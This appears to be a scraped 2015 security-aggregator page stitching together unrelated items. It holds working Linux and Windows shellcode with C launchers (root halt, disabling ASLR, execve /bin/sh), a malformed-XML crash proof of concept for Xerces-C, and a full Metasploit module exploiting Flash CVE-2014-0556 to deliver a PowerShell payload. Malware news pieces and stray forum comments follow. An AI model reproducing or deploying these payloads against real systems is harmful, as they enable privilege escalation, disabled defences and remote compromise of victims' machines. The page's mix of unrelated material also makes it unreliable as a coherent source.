Aerosol

/* +======================================================================================== | # Exploit Title : linux/x86 setreuid(0, 0) + execve("/sbin/halt") + exit(0) - 49 bytes | # Exploit Author : Febriyanto Nugroho | # Tested on : Linux Debian 5.0.5 +======================================================================================== */ #include <stdio.h> #include <string.h> char s[] = "\x31\xc0\x31\xdb\x50\x53\x89\xe1" "\xb0\x46\xcd\x80\x31\xc0\x50\x68" "\x68\x61\x6c\x74\x68\x6e\x2f\x2f" "\x2f\x68\x2f\x73\x62\x69\x89\xe3" "\x50\x53\xb0\x0b\x89\xe1\xcd\x80" "\x31\xc0\x50\x89\xe3\xb0\x01\xcd" "\x80"; int main(int argc, char *argv[]) { printf("shellcode length -> %d bytes\n", strlen(s)); int(*fuck)() = (int(*)())s; fuck(); return 0; } Source

/* #[+] Author: TUNISIAN CYBER #[+] Title: Shellcode: win32/xp sp3 Create ("file.txt") (83 bytes) #[+] Date: 15-04-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp 32bit SP3 #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Credits: steve hanna projectshellcode.com ============================= Assembly: ;create.asm [Section .text] BITS 32 global _start _start: jmp short GetCommand CommandReturn: pop ebx xor eax,eax push eax push ebx mov ebx,0x7c8623ad call ebx xor eax,eax push eax mov ebx, 0x7c81cafa call ebx GetCommand: call CommandReturn db "cmd.exe /C echo shellcode by tunisian cyber >file.txt" db 0x00 ============================= */ char shellcode[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23\x86\x7c\xff" "\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x6d\x64\x2e\x65\x78" "\x65\x20\x2f\x43\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x20\x62\x79" "\x20\x74\x75\x6e\x69\x73\x69\x61\x6e\x20\x63\x79\x62\x65\x72\x20\x3e\x66\x69\x6c\x65\x2e\x74\x78\x74\x00"; int main(int argc, char **argv){int (*f)();f = (int ())shellcode;(int)(*f)();} Source

/* #Title: Disable ASLR in Linux (less byte and more compact) #Length: 84 bytes #Date: 3 April 2015 #Author: Mohammad Reza Ramezani (mr.ramezani.edu@gmail.com - g+) #Tested On: kali-linux-1.0.6-i386 Thanks to stackoverflow section .text global _start _start: jmp short fileaddress shellcode: pop ebx xor eax,eax mov byte [ebx + 35],al push byte 5 pop eax push byte 2 pop ecx int 80h mov ebx, eax push byte 4 pop eax jmp short output cont: pop ecx push byte 2 pop edx int 80h push byte 1 pop eax xor ebx, ebx int 80h fileaddress: call shellcode db '/proc/sys/kernel/randomize_va_spaceX' output: call cont db '0',10 */ char shellcode[] = "\xeb\x22\x5b\x31\xc0\x88\x43\x23\x6a\x05\x58" "\x6a\x02\x59\xcd\x80\x89\xc3\x6a\x04\x58\xeb\x36\x59\x6a\x02\x5a \xcd\x80\x6a\x01\x58\x31\xdb\xcd\x80\xe8\xd9\xff\xff\xff\x2f\x70 \x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72 \x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63 \x65\x58\xe8\xc5\xff\xff\xff\x30\x0a"; int main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Source

Developing MIPS Exploits to Hack Routers 1 1. INTRODUCTION 3 2. PREPARING LAB 3 2.1. Running Debian MIPS on QEMU 3 2.2. Cross Compiling for MIPS (bonus section) 4 3. REVERSE ENGINEERING THE BINARY 5 3.1. Obtaining The Target Binary 5 3.2. Getting The Target Running 6 3.3. Setting Up Remote Debugging 8 3.4. Analysing The Vulnerability 9 4. WRITING THE EXPLOIT 10 4.1. Restrictions and Solutions 10 4.2. Finding a Proper ROP Chain 11 4.2. MIPS Shellcoding 14 4.2.1 Writing Fork Shellcode 14 4.2.1 Writing Unlink Shellcode (bonus section) 16 5. CONCLUSION 18 6. References 19 Read more: https://www.exploit-db.com/docs/36806.pdf

Security vulnerabilities in the Client Management Software FrontRange DSM can be leveraged in attacks against corporate networks. Client management is a very important task in modern enterprise IT environments as all computer systems, whether client or server, should be managed throughout their entire system life cycle. There are many client management software solutions from different vendors that support IT managers and IT administrators in client management tasks like: • inventory • patch management • software deployment • license management As a matter of principle, in order to perform these functions, client management software requires high privileges, usually administrative rights, on the managed client and server systems. Therefore, client management software is an interesting target for attackers as vulnerabilities in this kind of software may be leveraged for privilege escalation attacks within corporate networks. During a penetration test of client and server systems of a corporate network, the SySS GmbH could find multiple security vulnerabilities in the client management software FrontRange Desktop & Server Management (DSM) v7.2.1.2020 [1] that could be successfully exploited in a privilege escalation attack resulting in administrative privileges for the entire Windows domain. Security Assessment During a security assessment of a client system managed with FrontRange DSM, the SySS GmbH found out that the client management solution FrontRange DSM stores and uses sensitive user credentials for required user accounts in an insecure manner which enables an attacker or malware with file system access to a managed client, for example with the privileges of a limited Windows domain user account, to recover the cleartext passwords. The recovered passwords can be used for privilege escalation attacks and for gaining unauthorized access to other client and/or server systems within the corporate network as at least one FrontRange DSM user account needs local administrative privileges on managed systems. FrontRange DSM stores passwords for different user accounts encrypted in two configuration files named NiCfgLcl.ncp and NiCfgSrv.ncp. These configuration files contain encrypted password information for different required FrontRange DSM user accounts (see [2]), for example: • DSM Runtime Service • DSM Distribution Service Privilege Escalation via Client Management Software SySS GmbH | April 2015 • Business Logic Server (BLS) Authentication • Database account The actual number of required FrontRange DSM user accounts depends on the chosen security level during the software installation as Figure 1 illustrates. A limited Windows domain user has read access to these configuration files that are usually stored in the following locations: • %PROGRAMFILES(X86)\NetInst\ NiCfgLcl.ncp (local on a managed client) • %PROGRAMFILES(X86)\NetInst\ NiCfgSrv.ncp (local on a managed client) • \\<FRONTRANGE SERVER>\DSM$\ NiCfgLcl.ncp (remote on a DSM network share) • \\<FRONTRANGE SERVER>\DSM$\ NiCfgSrv.ncp (remote on a DSM network share) An analysis of the used encryption method by the SySS GmbH showed, that the passwords are encoded and encrypted using a hard-coded secret (cryptographic key) contained within the FrontRange DSM executable file NiInst32. exe. Furthermore, the SySS GmbH found out that the process NiInst32.exe, that is executed in the context of a low-privileged user, decrypts and uses some of the user credentials contained in the FrontRange DSM configuration files. Thus, an attacker or malware running in the same low-privileged user context can analyze and control the process NiInst32.exe and in this way gain access to decrypted cleartext passwords. For instance, such an online attack targeting the running process NiInst32.exe can be performed using an application-level debugger like OllyDbg [3] from the perspective of a limited Windows user. Figure 2 exemplarily shows the successful extraction of the decrypted cleartext password of the FrontRange DSM user account DSM Distribution Service. In order to gain ac Read more: https://www.exploit-db.com/docs/36872.pdf

/* * linux/x86 exit(0) - 6 bytes * Febriyanto Nugroho */ #include <stdio.h> char shellcode[] = "\xf7\xf0" "\xcd\x80" "\xeb\xfa"; int main(int argc, char **argv) { asm("jmp %0;" : "=m" (shellcode)); } Source

/* # # Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes) # # Dying to be the shortest. # # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com) # # 27 April 2015 # # GPL # .global _start _start: # char *const argv[] xorl %esi, %esi # 'h' 's' '/' '/' 'n' 'i' 'b' '/' movq $0x68732f2f6e69622f, %rbx # for '\x00' pushq %rsi pushq %rbx pushq %rsp # const char *filename popq %rdi # __NR_execve 59 pushq $59 popq %rax # char *const envp[] xorl %edx, %edx syscall */ /* gcc -z execstack push64.c uname -r 3.19.3-3-ARCH */ #include <stdio.h> #include <string.h> int main(void) { char *shellcode =3D "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56= \x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"; printf("strlen(shellcode)=3D%d\n", strlen(shellcode)); ((void (void))shellcode)(); return 0; } Linux x86-64 - Execve /bin/sh Shellcode Via Push (23 bytes) Linux x86 - Execve /bin/sh Shellcode Via Push (21 bytes) /* # # Execve /bin/sh Shellcode Via Push (Linux x86 21 bytes) # # Dying to be the shortest. # # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com) # # 18 February 2015 # # GPL # .global _start _start: # char *const argv[] xorl %ecx, %ecx # 2 bytes, and both %eax and %edx were zeroed mull %ecx # __NR_execve 11 movb $11, %al # for '\x00' pushl %ecx # 'h' 's' '/' '/' pushl $0x68732f2f # 'n' 'i' 'b' '/' pushl $0x6e69622f # const char *filename movl %esp, %ebx int $0x80 */ /* gcc -z execstack -m32 push.c uname -r 3.19.3-3-ARCH */ #include <stdio.h> #include <string.h> int main(void) { char *shellcode =3D "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68= \x2f\x62\x69\x6e\x89\xe3\xcd\x80"; printf("strlen(shellcode)=3D%d\n", strlen(shellcode)); ((void (void))shellcode)(); return 0; }

# Exploit Title: Apache Xerces-C XML Parser (< 3.1.2) DoS POC # Date: 2015-05-03 # Exploit Author: beford # Vendor Homepage: http://xerces.apache.org/#xerces-c # Version: Versions prior to 3.1.2 # Tested on: Ubuntu 15.04 # CVE : CVE-2015-0252 Apache Xerces-C XML Parser Crashes on Malformed Input I believe this to be the same issue that was reported on CVE-2015-0252, posting this in case anyone is interested in reproducing it. Original advisory: https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt $ printf "\xff\xfe\x00\x00\x3c" > file.xml $ DOMPrint ./file.xml # Ubuntu 15.04 libxerces-c3.1 package Segmentation fault $ ./DOMPrint ./file.xml # ASAN Enabled build ================================================================= ==6831==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c at pc 0x836a721 bp 0xbf8127a8 sp 0xbf812798 READ of size 1 at 0xb5d9d87c thread T0 #0 0x836a720 in xercesc_3_1::XMLReader::refreshRawBuffer() xercesc/internal/XMLReader.cpp:1719 #1 0x836a720 in xercesc_3_1::XMLReader::xcodeMoreChars(unsigned short*, unsigned char*, unsigned int) xercesc/internal/XMLReader.cpp:1761 #2 0x837183f in xercesc_3_1::XMLReader::refreshCharBuffer() xercesc/internal/XMLReader.cpp:576 #3 0x837183f in xercesc_3_1::XMLReader::peekString(unsigned short const*) xercesc/internal/XMLReader.cpp:1223 #4 0x83ad0ae in xercesc_3_1::ReaderMgr::peekString(unsigned short const*) xercesc/internal/ReaderMgr.hpp:385 #5 0x83ad0ae in xercesc_3_1::XMLScanner::checkXMLDecl(bool) xercesc/internal/XMLScanner.cpp:1608 #6 0x83b6469 in xercesc_3_1::XMLScanner::scanProlog() xercesc/internal/XMLScanner.cpp:1244 #7 0x8d69220 in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:206 #8 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400 #9 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408 #10 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601 #11 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 #12 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d) #13 0x805d3b5 (/ramdisk/DOMPrint+0x805d3b5) 0xb5d9d87c is located 0 bytes to the right of 163964-byte region [0xb5d75800,0xb5d9d87c) allocated by thread T0 here: #0 0xb72c3ae4 in operator new(unsigned int) (/usr/lib/i386-linux-gnu/libasan.so.1+0x51ae4) #1 0x8340cce in xercesc_3_1::MemoryManagerImpl::allocate(unsigned int) xercesc/internal/MemoryManagerImpl.cpp:40 #2 0x8094cb2 in xercesc_3_1::XMemory::operator new(unsigned int, xercesc_3_1::MemoryManager*) xercesc/util/XMemory.cpp:68 #3 0x8daaaa7 in xercesc_3_1::IGXMLScanner::scanReset(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner2.cpp:1284 #4 0x8d6912a in xercesc_3_1::IGXMLScanner::scanDocument(xercesc_3_1::InputSource const&) xercesc/internal/IGXMLScanner.cpp:198 #5 0x83cd3e7 in xercesc_3_1::XMLScanner::scanDocument(unsigned short const*) xercesc/internal/XMLScanner.cpp:400 #6 0x83ce728 in xercesc_3_1::XMLScanner::scanDocument(char const*) xercesc/internal/XMLScanner.cpp:408 #7 0x849afc5 in xercesc_3_1::AbstractDOMParser::parse(char const*) xercesc/parsers/AbstractDOMParser.cpp:601 #8 0x8050bf2 in main src/DOMPrint/DOMPrint.cpp:398 #9 0xb6f5272d in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x1872d) SUMMARY: AddressSanitizer: heap-buffer-overflow xercesc/internal/XMLReader.cpp:1719 xercesc_3_1::XMLReader::refreshRawBuffer() Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Powershell include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => 'Adobe Flash Player copyPixelsToByteArray Integer Overflow', 'Description' => %q{ This module exploits an integer overflow in Adobe Flash Player. The vulnerability occurs in the copyPixelsToByteArray method from the BitmapData object. The position field of the destination ByteArray can be used to cause an integer overflow and write contents out of the ByteArray buffer. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 to IE 11 and Flash 14.0.0.176, 14.0.0.145 and 14.0.0.125. }, 'License' => MSF_LICENSE, 'Author' => [ 'Chris Evans', # Vulnerability discovery and 64 bit analysis / exploit 'Nicolas Joly', # Trigger for 32 bit, according to the project zero ticket 'hdarwin', # @hdarwin89, 32 bit public exploit, this msf module uses it 'juan vazquez' # msf module ], 'References' => [ ['CVE', '2014-0556'], ['URL', 'http://googleprojectzero.blogspot.com/2014/09/exploiting-cve-2014-0556-in-flash.html'], ['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=46'], ['URL', 'http://hacklab.kr/cve-2014-0556-%EB%B6%84%EC%84%9D/'], ['URL', 'http://malware.dontneedcoffee.com/2014/10/cve-2014-0556-adobe-flash-player.html'], ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb14-21.html'] ], 'Payload' => { 'DisableNops' => true }, 'Platform' => 'win', 'BrowserRequirements' => { :source => /script|headers/i, :os_name => OperatingSystems::Match::WINDOWS_7, :ua_name => Msf::HttpClients::IE, :flash => lambda { |ver| ver =~ /^14\./ && Gem::Version.new(ver) <= Gem::Version.new('14.0.0.176') }, :arch => ARCH_X86 }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Sep 23 2014', 'DefaultTarget' => 0)) end def exploit @swf = create_swf super end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") if request.uri =~ /\.swf$/ print_status('Sending SWF...') send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) return end print_status('Sending HTML...') send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) end def exploit_template(cli, target_info) swf_random = "#{rand_text_alpha(4 + rand(3))}.swf" target_payload = get_payload(cli, target_info) psh_payload = cmd_psh_payload(target_payload, 'x86', {remove_comspec: true}) b64_payload = Rex::Text.encode_base64(psh_payload) html_template = %Q|<html> <body> <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /> <param name="movie" value="<%=swf_random%>" /> <param name="allowScriptAccess" value="always" /> <param name="FlashVars" value="sh=<%=b64_payload%>" /> <param name="Play" value="true" /> <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>" Play="true"/> </object> </body> </html> | return html_template, binding() end def create_swf path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-0556', 'msf.swf') swf = ::File.open(path, 'rb') { |f| swf = f.read } swf end end Source

Core checker a defensive wrecker Seculert CTO Aviv Raff says a nasty piece of malware linked to widespread destruction and bank account plundering has become more dangerous with the ability to evade popular sandboxes. Raff says the Dyre malware ducks popular sandbox tools by detecting the number of cores in use. The known but effective and previously unused technique is enough to beat at least eight of the most widely used free and commercial kit, Raff says. "If the machine has only one core it immediately terminates," Raff says in a post. "As many sandboxes are configured with only one processor with one core as a way to save resources, the check performed by Dyre is a good and effective way to avoid being analysed. "On the other hand, most of the PCs in use today have more than one core." Dyre is linked to a variant Dyre Wolf that IBM said last month plundered some $1 million from bank accounts. Raff informed the affected sandbox developers of the evasion technique. Dyre's Upatre downloader also sports new evasion techniques including a different user agent and grammatical fixes previously used to identify the malware. Raff says the technique proves sandboxing should not be used in isolation to stamp out malware. It is the latest development in a long history of cat-and-mouse warfare between malware writers and white hat defenders. Criminals need to contend with infiltrating victim machines while avoid anti-virus and white hats who look for indicators that are hallmarks of a type of malware. Defenders meanwhile face malware that uses increasingly complex evasion techniques that are specifically honed to beat sandboxes, virtual machines and other tools. Source

Salut si bine ai venit pe RST! p.s:// frumoasa prezentare.

Felicitari kronzy, nu imi mai tai nimic!

Researchers with security firm Proofpoint have identified a sneaky social engineering-style operation in which attackers are submitting weaponized Microsoft Word documents – in lieu of actual résumés – to job postings listed on the CareerBuilder website. On CareerBuilder, employers that post job openings will receive an email notification when an applicant submits a résumé, and the résumé is included as an attachment in the notification, according to a Wednesday post. In this operation, the attackers are submitting malicious documents that exploit a memory corruption vulnerability in Word RTF, the post indicated. The documents are crafted using Microsoft Word Intruder (MWI), an underground crime service used to build weaponized documents typically meant for delivering malware. Proofpoint observed a low volume of malicious documents being submitted for engineering and finance positions – such as business analyst, web developer and middleware developer – at stores, energy companies, broadcast companies, credit unions and electrical suppliers, according to the post. “The attacks appear to be financially motivated; attackers are attempting to gain access to critical systems at companies that have access to wire-transferrable cash reserves and/or large volumes of information that's of value on the black market,” Kevin Epstein, VP of Advanced Security & Governance with Proofpoint, told SCMagazine.com in a Thursday email correspondence. Upon opening the malicious Word document, code embedded by the attackers stealthily causes two seemingly innocuous files to download – a decompression app and what appears to be an image. If the image is opened by the decompression app, malware known as Sheldor begins running, Epstein said, explaining that the “combined delivery approach” helps with concealment. Sheldor – which is packaged with legitimate remote assistance app TeamViewer in order to further prevent detection – provides a backdoor into computers, Epstein said. “Once Sheldor is on your computer, attackers can use your computer in the background, without your knowledge,” he said. “They will have the same file and network access as you do, and can even log your keystrokes, activate your webcam, use your microphone, and so forth.” Modern targeted attack protection and threat response systems are a must for online services that accept documents from unknown individuals on the internet, as well as for organizations that accept inbound emails with attachments and URLs, Epstein said. CareerBuilder did not return a SCMagazine.com request for comment. UPDATE: A CareerBuilder spokesperson told SCMagazine.com on Thursday, “CareerBuilder follows Incident Response protocols, investigating the scope and type of attack with the help of third party experts kept under contract, and sharing information with affected customers. CareerBuilder has controls in place to stop mass distribution of applications to job postings and takes a variety of preventative measures.” Source

Schizophrenic crims send Tesla claim calls to home of allegedly unconnected individual The website and Twitter account of carmaker Tesla were hacked over the weekend, as part of what looks like a prank between rival hackers. Elon Musk’s personal Twitter account was also hijacked on Saturday night (US time) by miscreants who at one point claimed to be from the infamous Lizard Squad hacking crew. The name Autismsquad was also used in some of the captured website defacements, a crudely done collage. Hackers were able to temporarily seize control after Tesla had its DNS hacked and MX (mail) and other records changed. Twitter passwords were then reset, with instructions on how to change login credentials sent to accounts under the control of hackers. It isn't clear how the DNS records were changed in the first place, but use of social engineering trickery to trick third parties into changing website names to IP address records has been a feature of similar hacks in the past. @chf060 and @RooTworx, denied any connection with the breach, and said that miscreants had offered his home phone number as the number to call for the mythical free Tesla. A good write-up of the attack as it unfolded can be found on the Transport Evolved blog here. Lizard Squad are infamous for taking out XBox Live last Christmas in what turned out to be a promo for a short-lived DDoS-for-hire (AKA booter) cybercrime service. Taking over a website put up by any organisation is the equivalent of scrawling graffiti on a poster put up by a firm. Websites are commonly hosted by third parties and breaking into them, while undesirable, ought not be confused to hacking into a corporate network. Redirecting surfers to a website under hacker control is rather more serious, because this sort of thing can easily be used to spread malware. There's no evidence as yet of this taking place in the case of the Tesla Motors hack. Losing control of email accounts is serious, however, because it can allow hackers to get their hands on confidential information. Such data can be either leaked with the idea of causing maximum embarrassment for the pwned organisation, or used as collateral for attempted extortion. Security commentary on the implications of the attack can be found in a post on BitDefenders' Hot for Security blog. Source

Dropbox strikes back against Bartalex macro malware phishers Dropbox has struck back against a hacker group using its cloud storage services to store and spread the Bartalex macro malware. Trend Micro fraud analyst Christopher Talampas reported uncovering the campaign while investigating attacks targeting the Automated Clearing House (ACH) network used by many businesses for electronic funds transfers in the US on Tuesday. A Dropbox spokesperson later told V3 that the firm is aware of the campaign and has already taken action against the hackers. "We're aware of the issue and have already revoked the ability for accounts involved to share links since they've violated our Acceptable Use Policy," said the spokesperson. "We act quickly in response to abuse reports submitted to abuse@dropbox.com, and are constantly improving how we detect and prevent Dropbox users from sharing spam, malware or phishing links." The use of Dropbox links containing the Bartalex macro malware reportedly makes the campaign particularly dangerous. "Instead of attachments, the message this time bore a link to ‘view the full details'. By hovering over the URL we can see that it redirects to a Dropbox link with a file name related to the supposed ACH transaction," read Trend Micro in an advisory. "The URL leads to a Dropbox page that contains specific instructions (and an almost convincing) Microsoft Office warning that instructs users to enable the macros. "Upon enabling the macro, the malicious document then triggers the download of the banking malware." Trend Micro reported uncovering at least 1,000 malicious Dropbox links hosting the malware during the campaigns peak. It is unclear how successful the campaign has been, although Trend Micro said that the malware has been used to target big name financial institutions including JP Morgan. Trend Micro cited the use of macro malware as a sign that criminals are rehashing old tricks in a bid to get round more modern system defences. "Macro malware like Bartalex is seemingly more prominent than ever, which is an indicator that old threats are still effective infection vectors on systems today," read the advisory. "And they seem to be adapting: they are now being hosted in legitimate services like Dropbox and, with the recent outbreak, macro malware may continue to threaten more businesses in the future." Macro malware is a threat that afflicted older versions of Windows. Microsoft ended the threat with Office XP in 2001 when it tweaked its systems to request user permission before executing macros script in embedded files. Macros are code scripts containing commands for automating tasks that are used in numerous applications. The discovery follows a reported boom in phishing levels. Research from Verizon earlier in April showed that a staggering one in four phishing scams currently result in success. Source

The road towards phasing out the ageing SHA-1 crypto hash function is likely to be littered with potholes, security experts warn. SHA-1 is a hashing (one-way) function) that converts information into a shortened "message digest", from which it is impossible to recover the original information. This hashing technique is used in digital signatures, verifying that the contents of software downloads have not been tampered with, and many other cryptographic applications. The ageing SHA-1 protocol – published in 1995 – is showing its age and is no longer safe from Collision Attacks, a situation where two different blocks of input data throw up the same output hash. This is terminal for a hashing protocol, because it paves the way for hackers to offer manipulated content that carries the same hash value as pukka packets of data. Certificate bodies and others are beginning to move on from SHA-1 to its replacement, SHA-2. Microsoft announced its intent to deprecate SHA-1 in Nov 2013. More recently, Google joined the push with a decision to make changes in he latest version of its browser, Chrome version 42, so that SHA-1 certificates are flagged up as potentially insecure. Nudge Ken Munro, a director at security consultancy Pen Test Partners, warned that this type of behaviour creates the danger that while SHA-2 is being phased in, trust in certificates will suffer. "The risk of not updating could see users learn not to trust your site (reduced custom) or could encourage them to accept less-than-perfect encryption or even invalid certificates," Munro explained. Just updating to SHA-2 is not as simple as it might seem, because of compatibility issues with Android and Windows XP. More specifically, Android before 2.3 and XP before SP3 are incompatible with the change (a fuller compatibility matrix maintained by digital certificate firm GlobalSign can be found here). Windows XP may have been put out to pasture last year, but it's still widely used. Older versions of Android also present a problem. Around one per cent of devices used for Google Play are still <2.3 (Froyo) or below. Whilst the current Play Store version doesn't work pre 2.2, that still indicates that around 20 million active devices are in use that aren’t compatible with SHA-2, according to Munro. "The fact that SHA-2 can’t be used with older browsers and OS’s means that untrusted certificate warnings are going to become commonplace," Munro explained. "And if that happens, the danger is that many users will simply ride rough-shod over such pop-ups, potentially creating the ideal opportunity for man-in-the-middle (MitM) attacks." Ivan Ristic, a software engineer and founder of SSL Labs, agreed with Munro that there might be some trouble with the phasing out of SHA-1, "as with all older technologies". "Websites with older audiences might consider deploying with dual certificates; older SHA-1 for older clients and newer SHA-2 for modern clients," Ristic told El Reg. "Not all web servers support this, however." "To prevent warnings in Chrome, sites must upgrade to SHA-2 by the end of this year. However, it's possible to continue to use SHA-1 certificates at least until the end of 2016. So this gives sites at least about 1.5 years." Baseline requirements from industry group the CA/Browser Forum (PDF) offer "room for a reasonably safe dual-cert deployment" for even longer, if really necessary, up until the start of 2017. Macro signing Browser compatibility is not the only issue. SHA-2 compatibility for macro signing isn’t great, according to Munro, who said "it simply doesn’t work for Office 2003/2007 macro signing". Office 2010 does support SHA-2 macro signing, but only with a hotfix. Munro added: "There are plenty of other systems out there that are unlikely to ever accept SHA-2: what about the web interfaces for SCADA and other industrial control systems? What about other highly customised environments in the military: fire control systems built on old hardened versions of Windows XP?" Microsoft made some changes/exceptions for code signing, according to Ristic. ® Bootnote Microsoft's IE will allow "CAs to continue to issue SSL and code signing certificates until January 1 2016, and thereafter issue SHA-2 certificates only”. Google's Chrome will handle sites with end-entity (“leaf”) certificates that expire on or after 1 January 2017, and which include an SHA-1-based signature as part of the certificate chain, as “secure, but with minor errors”. Mozilla, makers of Firefox, has developed a policy that SHA-1 certificates should not be issued after January 1 2016, nor trusted after January 1 2017. Source

Several thousand computers running the Linux and FreeBSD operating systems have been infected over the past seven months with sophisticated malware that surreptitiously makes them part of a renegade network blasting the Internet with spam, researchers said Wednesday. The malware likely infected many more machines during the five years it's known to have existed. Most of the machines infected by the so-called Mumblehard malware are believed to run websites, according to the 23-page report issued by researchers from antivirus provider Eset. During the seven months that they monitored one of its command and control channels, 8,867 unique IP addresses connected to it, with 3,000 of them joining in the past three weeks. The discovery is reminiscent of Windigo, a separate spam botnet made up of 10,000 Linux servers that Eset discovered 14 months ago. The Mumblehard malware is the brainchild of experienced and highly skilled programmers. It includes a backdoor and a spam daemon, which is a behind-the-scenes process that sends large batches of junk mail. These two main components are written in Perl and they're obfuscated inside a custom "packer" that's written in assembly, a low-level programming language that closely corresponds to the native machine code of the computer hardware it runs on. Some of the Perl script contains a separate executable with the same assembly-based packer that's arranged in the fashion of a Russian nesting doll. The result is a very stealthy infection that causes production servers to send spam and may serve other nefarious purposes. More and more complex "Malware targeting Linux and BSD servers is becoming more and more complex," researchers from Eset wrote. "The fact that the authors used a custom packer to hide the Perl source code is somewhat sophisticated. However, it is definitely not as complex as the Windigo Operation we documented in 2014. Nonetheless, it is worrying that the Mumblehard operators have been active for many years without disruption." The researchers uncovered evidence that Mumblehard may have links to Yellsoft, a company that sells DirecMailer, which is Perl-based software for sending bulk e-mail. The block of IP addresses for both Yellsoft and some of the Mumblehard C&C servers share the same range. What's more, pirated copies of DirecMailer silently install the Mumblehard backdoor. The pirated copies are also obfuscated by the same packer used by Mumblehard's malicious components. Eset researchers discovered Mumblehard after being contacted by a system administrator who sought assistance for a server that was added to public security blacklists for sending spam. The researchers identified and analyzed a process that was causing the server to connect to different SMTP servers and send spam. The researchers then linked the behavior to an executable file located in the server's /tmp directory. A version of the Mumblehard spam component was uploaded to the VirusTotal online malware checking service in 2009, an indication that the spammer program has existed for more than five years. The researchers were able to monitor the botnet by registering one of the domain names that Mumblehard-infected machines query every 15 minutes. The Eset researchers still aren't certain how Mumblehard is installed. Based on their analysis of the infected server, they suspect the malware may take hold by exploiting vulnerabilities in the Joomla and WordPress content management systems. Their other theory is that the infections are the result of installing pirated versions of the DirecMailer program. The almost 9,000 IP addresses Eset observed can't be directly correlated to the number of machines that were infected by Mumblehard, since in some cases more than one server may share an address and in other cases a single server may give up an old address and take up a new one. Still, the number is a strong indication that several thousand machines were affected during the seven months Eset monitored the malware. Administrators who want to check their servers for Mumblehard infections should look for unexplained daemons. These so-called cronjobs added by the malware activate the backdoor and cause it to query C&C servers four times per hour in precise, 15-minute increments. The backdoor is usually located in the /tmp or /var/tmp folders. The backdoor can be deactivated by mounting the directories with the noexec option. Source

Google has been obliged to revise its Password Alert anti-phishing protection just hours after releasing it when security researchers showed how the technology was easily circumvented. Security consultant Paul Moore (@Paul_Reviews) has published a proof-of-concept JavaScript exploit that skirted the defensive technology with just seven lines of code. The Password Alert for Chrome browser plug-in is meant to trigger alerts for users in cases when they are induced to hand over their password to counterfeit sites impersonating Google (other online services aren't covered). The extension only kicks into action after users have signed into their Google account; thereafter it puts up warnings to reset Gmail passwords in cases where users are taken in by a phish. The problem is these alerts can be shut down with minimum effort and a few lines of JavaScript planted on counterfeit sites. More specifically, Moore's script looks for a warning banner every five milliseconds before removing anything it detects. Other approaches aimed at preventing humans actually seeing a warning – effectively killing off alerts kill as soon as they are generated – might also have been possible. Moore posted a short video on YouTube to highlight his concerns. Bypassing Google's Password Alert "Protection" Chris Boyd, a malware intelligence analyst at security software firm Malwarebytes, backed up worries about how easily Password Alert might be bypassed in a blog post that explains the issue in greater depth here. To its credit, Google responded promptly to the issue, updating its technology hours after El Reg flagged up the problem and requested a comment. "[The] issue is now fixed and the current version of Password Alert includes the patch," a spokesman told El Reg by email on Friday morning. Google's anti-phishing tech was only released on Wednesday so early teething troubles are arguably to be expected. Relying on Password Alert is, in any case, maybe not enough and users should consider turning on two-step authentication and/or using a full fat password manager such as LastPass to protect them from phishing attacks. Google researchers and a team from University of California, San Diego recently warned (PDF) that the most effective phishing attacks can succeed 45 per cent of the time. Source

